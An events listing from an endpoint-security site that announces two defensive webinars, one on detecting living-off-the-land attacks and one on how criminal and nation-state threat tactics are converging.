Endpoint Security

Events

Views Navigation

Event Views Navigation

Today

    • Living-Off-the-Land Attacks Dwell for Months. Here’s Why Your Detection Stack Keeps Missing Them.

    Living-off-the-land (LOTL) attacks do not drop malware, install backdoors, or trigger signature-based detections. They use the tools already present in your environment: PowerShell, WMI, legitimate remote administration utilities, and valid credentials. Nation-state groups and sophisticated criminal operators favor this approach because it blends seamlessly with normal administrative activity. Some LOTL intrusions dwell for months or even years before discovery.

    Most detection stacks were built to find things that should not be there. LOTL attacks invert the problem by using things that should be there. As a result, organizations are being forced to rethink how detection, identity, and behavioral signals work together across the stack to distinguish legitimate activity from attacker behavior.

    Addressing LOTL techniques requires coordination across endpoint, network, identity, and behavioral analytics capabilities – from EDR and XDR to ITDR, NDR, UEBA, and deception technologies.

    Topics include:

    • How LOTL attackers exploit native tools and legitimate credentials to evade detection
    • Why signature-based and file-based detection strategies fail against fileless techniques
    • Building a detection posture around behavioral analysis, credential monitoring, and assumed compromise

    Discover how to close the detection gaps that LOTL attackers are counting on and build defenses designed for threats that look like normal operations.

    Topics:
    , , , , , , , , , ,

    • Nation-state Tactics in Criminal Hands: What the Blurring of Threat Actor Lines Means for Your Defenses

    The line separating nation-state operations from criminal activity is collapsing. Criminal groups are adopting techniques that were once the exclusive domain of state-sponsored actors: supply chain compromise, living-off-the-land intrusions, pre-positioning inside critical infrastructure, and coordinated campaigns timed to geopolitical events. At the same time, nation-states are outsourcing operations to criminal proxies, creating a blended threat landscape where attribution is harder and the sophistication floor keeps rising. What once required a government-backed team and years of development is now available as a service on dark web forums.

    For defenders, this convergence changes the calculus. Threat models built around the assumption that criminal actors use commodity tools and state actors use custom capabilities no longer hold. Addressing this requires coordination across threat intelligence, detection and response platforms, and security analytics capabilities to build defenses that account for sophisticated adversaries regardless of attribution. That means threat intelligence that tracks actor behavior rather than just indicators of compromise, detection strategies calibrated for advanced tradecraft at any scale, and incident response plans that prepare for the possibility that a ransomware attack is the visible layer of a deeper intrusion.

    Topics include:

    • How the convergence of criminal and nation-state tactics is reshaping the threat landscape
    • Moving threat intelligence from indicator-based feeds to behavior-based analysis
    • Building detection and response capabilities calibrated for sophisticated adversaries at any scale

    Explore what the blurring of threat actor lines means for your security strategy and how to defend against adversaries who no longer fit neatly into categories.

    Topics:
    , , , , , , , , ,